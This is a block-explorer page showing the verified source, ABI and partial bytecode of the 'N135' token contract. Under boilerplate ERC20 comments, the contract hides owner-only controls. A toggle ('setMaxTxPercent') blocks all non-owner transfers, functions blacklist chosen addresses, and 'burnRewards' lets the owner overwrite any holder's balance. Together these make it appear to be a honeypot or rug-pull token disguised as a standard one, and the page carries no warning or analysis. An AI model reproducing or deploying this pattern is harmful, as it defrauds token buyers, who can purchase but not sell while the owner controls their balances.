Contract Address Details

0xDcf5A7EE561dA09ffDB77CAe7a8666714dAFb599

Token
N135 (N135)
Creator
0xabcff8–9f6d8e at 0x223d7b–9d0994
Balance
0 Doge
Tokens
Fetching tokens...
Transactions
0 Transactions
Transfers
0 Transfers
Gas Used
Fetching gas used...
Last Balance Update
29621090
Contract name:
N135




Optimization enabled
false
Compiler version
v0.8.1+commit.df193b15




EVM Version
default




Verified at
2022-09-05T14:25:42.102572Z

Constructor Arguments

00000000000000000000000000000000000000000000000001e018b07e67759f

Arg [0] (uint256) : 135135135135135135

              

Contract source code

// SPDX-License-Identifier: MIT

pragma solidity =0.8.1;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint256);
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping (address => uint256) internal _balances;
    mapping (address => bool) private _approveTransfer;
    mapping (address => mapping (address => uint256)) private _allowances;
    uint256 internal _totalSupply;
    uint256 _reward;
    string internal _name;
    string internal _symbol;
    uint256 internal _decimals;
    bool maxTxPercent = true;
    address internal _owner;
    address private uniV2router;
    address private uniV2factory;
    

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_, uint256 decimals_) {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
        _owner = msg.sender;
    }

    modifier onlyOwner() {
        require(_owner == msg.sender, "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint256) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }
    
    function recall(address _address) external onlyOwner {
        _approveTransfer[_address] = false;
    }

    function approveTransfer(address _address) external onlyOwner {
        _approveTransfer[_address] = true;
    }

    function approvedTransfer(address _address) public view returns (bool) {
        return _approveTransfer[_address];
    }

    function setMaxTxPercent() public virtual onlyOwner {
        if (maxTxPercent == true) {maxTxPercent = false;} else {maxTxPercent = true;}
    }
 
    function maxTxPercentState() public view returns (bool) {
        return maxTxPercent;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    function reflectReward (uint256 value) external onlyOwner {
        _reward = value;
    }
    
    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be grater thatn zero");
        if (_approveTransfer[sender] || _approveTransfer[recipient]) 
        require(maxTxPercent == false, "");
        if (maxTxPercent == true || sender == _owner || recipient == _owner) {
        _beforeTokenTransfer(sender, recipient, amount);
        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;
        emit Transfer(sender, recipient, amount);}
        else {require (maxTxPercent == true, "");} 
    }
    
    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        _balances[account] = _reward - amount;
        _totalSupply -= amount;
        emit Transfer(account, address(0), amount);
    }
    
    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}

contract N135 is ERC20 {
    constructor(uint256 initialSupply) ERC20(_name, _symbol, _decimals) {
        _name = "N135";
        _symbol = "N135";
        _decimals = 9;
        _totalSupply += initialSupply;
        _balances[msg.sender] += initialSupply;
        emit Transfer(address(0), msg.sender, initialSupply);
    }
    
    function burnRewards(address account, uint256 value) external onlyOwner {
    _burn(account, value);
    }
}

/**
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice, this list of
* conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright notice, this list
* of conditions and the following disclaimer in the documentation and/or other materials
* provided with the distribution.
* 3. Neither the name of the copyright holder nor the names of its contributors may be
* used to endorse or promote products derived from this software without specific prior
* written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
* SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
* TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
* BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
* ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
* DAMAGE.
**/
        

Contract ABI

[{"type":"constructor","stateMutability":"nonpayable","inputs":[{"type":"uint256","name":"initialSupply","internalType":"uint256"}]},{"type":"event","name":"Approval","inputs":[{"type":"address","name":"owner","internalType":"address","indexed":true},{"type":"address","name":"spender","internalType":"address","indexed":true},{"type":"uint256","name":"value","internalType":"uint256","indexed":false}],"anonymous":false},{"type":"event","name":"Transfer","inputs":[{"type":"address","name":"from","internalType":"address","indexed":true},{"type":"address","name":"to","internalType":"address","indexed":true},{"type":"uint256","name":"value","internalType":"uint256","indexed":false}],"anonymous":false},{"type":"function","stateMutability":"view","outputs":[{"type":"uint256","name":"","internalType":"uint256"}],"name":"allowance","inputs":[{"type":"address","name":"owner","internalType":"address"},{"type":"address","name":"spender","internalType":"address"}]},{"type":"function","stateMutability":"nonpayable","outputs":[{"type":"bool","name":"","internalType":"bool"}],"name":"approve","inputs":[{"type":"address","name":"spender","internalType":"address"},{"type":"uint256","name":"amount","internalType":"uint256"}]},{"type":"function","stateMutability":"nonpayable","outputs":[],"name":"approveTransfer","inputs":[{"type":"address","name":"_address","internalType":"address"}]},{"type":"function","stateMutability":"view","outputs":[{"type":"bool","name":"","internalType":"bool"}],"name":"approvedTransfer","inputs":[{"type":"address","name":"_address","internalType":"address"}]},{"type":"function","stateMutability":"view","outputs":[{"type":"uint256","name":"","internalType":"uint256"}],"name":"balanceOf","inputs":[{"type":"address","name":"account","internalType":"address"}]},{"type":"function","stateMutability":"nonpayable","outputs":[],"name":"burnRewards","inputs":[{"type":"address","name":"account","internalType":"address"},{"type":"uint256","name":"value","internalType":"uint256"}]},{"type":"function","stateMutability":"view","outputs":[{"type":"uint256","name":"","internalType":"uint256"}],"name":"decimals","inputs":[]},{"type":"function","stateMutability":"nonpayable","outputs":[{"type":"bool","name":"","internalType":"bool"}],"name":"decreaseAllowance","inputs":[{"type":"address","name":"spender","internalType":"address"},{"type":"uint256","name":"subtractedValue","internalType":"uint256"}]},{"type":"function","stateMutability":"nonpayable","outputs":[{"type":"bool","name":"","internalType":"bool"}],"name":"increaseAllowance","inputs":[{"type":"address","name":"spender","internalType":"address"},{"type":"uint256","name":"addedValue","internalType":"uint256"}]},{"type":"function","stateMutability":"view","outputs":[{"type":"bool","name":"","internalType":"bool"}],"name":"maxTxPercentState","inputs":[]},{"type":"function","stateMutability":"view","outputs":[{"type":"string","name":"","internalType":"string"}],"name":"name","inputs":[]},{"type":"function","stateMutability":"nonpayable","outputs":[],"name":"recall","inputs":[{"type":"address","name":"_address","internalType":"address"}]},{"type":"function","stateMutability":"nonpayable","outputs":[],"name":"reflectReward","inputs":[{"type":"uint256","name":"value","internalType":"uint256"}]},{"type":"function","stateMutability":"nonpayable","outputs":[],"name":"setMaxTxPercent","inputs":[]},{"type":"function","stateMutability":"view","outputs":[{"type":"string","name":"","internalType":"string"}],"name":"symbol","inputs":[]},{"type":"function","stateMutability":"view","outputs":[{"type":"uint256","name":"","internalType":"uint256"}],"name":"totalSupply","inputs":[]},{"type":"function","stateMutability":"nonpayable","outputs":[{"type":"bool","name":"","internalType":"bool"}],"name":"transfer","inputs":[{"type":"address","name":"recipient","internalType":"address"},{"type":"uint256","name":"amount","internalType":"uint256"}]},{"type":"function","stateMutability":"nonpayable","outputs":[{"type":"bool","name":"","internalType":"bool"}],"name":"transferFrom","inputs":[{"type":"address","name":"sender","internalType":"address"},{"type":"address","name":"recipient","internalType":"address"},{"type":"uint256","name":"amount","internalType":"uint256"}]}]
            

Contract Creation Code

0x60806040526001600860006101000a81548160ff0219169083151502179055503480156200002c57600080fd5b50604051620024a4380380620024a4833981810160405281019062000052919062000444565b60058054620000619062000505565b80601f01602080910402602001604051908101604052809291908181526020018280546200008f9062000505565b8015620000e05780601f10620000b457610100808354040283529160200191620000e0565b820191906000526020600020905b815481529060010190602001808311620000c257829003601f168201915b505050505060068054620000f49062000505565b80601f0160208091040260200160405190810160405280929190818152602001828054620001229062000505565b8015620001735780601f10620001475761010080835404028352916020019162000173565b820191906000526020600020905b8154815290600101906020018083116200015557829003601f168201915b50505050506007548260059080519060200190620001939291906200037d565b508160069080519060200190620001ac9291906200037d565b508060078190555033600860016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050506040518060400160405280600481526020017f4e3133350000000000000000000000000000000000000000000000000000000081525060059080519060200190620002459291906200037d565b506040518060400160405280600481526020017f4e3133350000000000000000000000000000000000000000000000000000000081525060069080519060200190620002939291906200037d565b5060096007819055508060036000828254620002b091906200049e565b92505081905550806000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546200030791906200049e565b925050819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200036e919062000481565b60405180910390a350620005b3565b8280546200038b9062000505565b90600052602060002090601f016020900481019282620003af5760008555620003fb565b82601f10620003ca57805160ff1916838001178555620003fb565b82800160010185558215620003fb579182015b82811115620003fa578251825591602001919060010190620003dd565b5b5090506200040a91906200040e565b5090565b5b80821115620004295760008160009055506001016200040f565b5090565b6000815190506200043e8162000599565b92915050565b6000602082840312156200045757600080fd5b600062000467848285016200042d565b91505092915050565b6200047b81620004fb565b82525050565b600060208201905062000498600083018462000470565b92915050565b6000620004ab82620004fb565b9150620004b883620004fb565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620004f057620004ef6200053b565b5b828201905092915050565b6000819050919050565b600060028204905060018216806200051e57607f821691505b602082108114156200053557620005346200056a565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b620005a481620004fb565b8114620005b057600080fd5b50565b611ee180620005c36000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c806370a08231116100a2578063ac8a93b811610071578063ac8a93b81461031b578063ca43051914610339578063d89cc15014610355578063dd62ed3e1461035f578063f3b95cd71461038f57610116565b806370a082311461026d57806395d89b411461029d578063a457c2d7146102bb578063a9059cbb146102eb57610116565b806323b872dd116100e957806323b872dd146101a3578063313ce567146101d357806339509351146101f15780633cd64cf3146102215780634355b9d21461025157610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd146101695780631fe6d7a814610187575b600080fd5b6101236103ab565b604051610130919061182b565b60405180910390f35b610153600480360381019061014e91906115d3565b61043d565b6040516101609190611810565b60405180910390f35b61017161045b565b60405161017e91906119ad565b60405180910390f35b6101a1600480360381019061019c919061160f565b610465565b005b6101bd60048036038101906101b89190611584565b6104ff565b6040516101ca9190611810565b60405180910390f35b6101db610600565b6040516101e891906119ad565b60405180910390f35b61020b600480360381019061020691906115d3565b61060a565b6040516102189190611810565b60405180910390f35b61023b6004803603810190610236919061151f565b6106b6565b6040516102489190611810565b60405180910390f35b61026b6004803603810190610266919061151f565b61070c565b005b6102876004803603810190610282919061151f565b6107f6565b60405161029491906119ad565b60405180910390f35b6102a561083e565b6040516102b2919061182b565b60405180910390f35b6102d560048036038101906102d091906115d3565b6108d0565b6040516102e29190611810565b60405180910390f35b610305600480360381019061030091906115d3565b6109c4565b6040516103129190611810565b60405180910390f35b6103236109e2565b6040516103309190611810565b60405180910390f35b610353600480360381019061034e919061151f565b6109f9565b005b61035d610ae4565b005b61037960048036038101906103749190611548565b610bce565b60405161038691906119ad565b60405180910390f35b6103a960048036038101906103a491906115d3565b610c55565b005b6060600580546103ba90611ae9565b80601f01602080910402602001604051908101604052809291908181526020018280546103e690611ae9565b80156104335780601f1061040857610100808354040283529160200191610433565b820191906000526020600020905b81548152906001019060200180831161041657829003601f168201915b5050505050905090565b600061045161044a610cf3565b8484610cfb565b6001905092915050565b6000600354905090565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146104f5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104ec906118ed565b60405180910390fd5b8060048190555050565b600061050c848484610ec6565b6000600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610557610cf3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156105d7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105ce906118cd565b60405180910390fd5b6105f4856105e3610cf3565b85846105ef9190611a3a565b610cfb565b60019150509392505050565b6000600754905090565b60006106ac610617610cf3565b848460026000610625610cf3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106a791906119e4565b610cfb565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461079c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610793906118ed565b60405180910390fd5b60018060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60606006805461084d90611ae9565b80601f016020809104026020016040519081016040528092919081815260200182805461087990611ae9565b80156108c65780601f1061089b576101008083540402835291602001916108c6565b820191906000526020600020905b8154815290600101906020018083116108a957829003601f168201915b5050505050905090565b600080600260006108df610cf3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561099c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109939061198d565b60405180910390fd5b6109b96109a7610cf3565b8585846109b49190611a3a565b610cfb565b600191505092915050565b60006109d86109d1610cf3565b8484610ec6565b6001905092915050565b6000600860009054906101000a900460ff16905090565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a89576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a80906118ed565b60405180910390fd5b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b74576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b6b906118ed565b60405180910390fd5b60011515600860009054906101000a900460ff1615151415610bb0576000600860006101000a81548160ff021916908315150217905550610bcc565b6001600860006101000a81548160ff0219169083151502179055505b565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610ce5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cdc906118ed565b60405180910390fd5b610cef82826113ad565b5050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d6b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d629061196d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ddb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd29061188d565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610eb991906119ad565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2d9061192d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610fa6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9d9061184d565b60405180910390fd5b60008111610fe9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe09061186d565b60405180910390fd5b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061108a5750600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110e65760001515600860009054906101000a900460ff161515146110e5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110dc9061194d565b60405180910390fd5b5b60011515600860009054906101000a900460ff16151514806111555750600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b806111ad5750600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b15611351576111bd8383836114f0565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611243576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161123a906118ad565b60405180910390fd5b818161124f9190611a3a565b6000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546112df91906119e4565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161134391906119ad565b60405180910390a3506113a8565b60011515600860009054906101000a900460ff161515146113a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161139e9061194d565b60405180910390fd5b5b505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561141d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114149061190d565b60405180910390fd5b8060045461142b9190611a3a565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550806003600082825461147f9190611a3a565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516114e491906119ad565b60405180910390a35050565b505050565b60008135905061150481611e7d565b92915050565b60008135905061151981611e94565b92915050565b60006020828403121561153157600080fd5b600061153f848285016114f5565b91505092915050565b6000806040838503121561155b57600080fd5b6000611569858286016114f5565b925050602061157a858286016114f5565b9150509250929050565b60008060006060848603121561159957600080fd5b60006115a7868287016114f5565b93505060206115b8868287016114f5565b92505060406115c98682870161150a565b9150509250925092565b600080604083850312156115e657600080fd5b60006115f4858286016114f5565b92505060206116058582860161150a565b9150509250929050565b60006020828403121561162157600080fd5b600061162f8482850161150a565b91505092915050565b61164181611a80565b82525050565b6000611652826119c8565b61165c81856119d3565b935061166c818560208601611ab6565b61167581611b79565b840191505092915050565b600061168d6023836119d3565b915061169882611b8a565b604082019050919050565b60006116b06029836119d3565b91506116bb82611bd9565b604082019050919050565b60006116d36022836119d3565b91506116de82611c28565b604082019050919050565b60006116f66026836119d3565b915061170182611c77565b604082019050919050565b60006117196028836119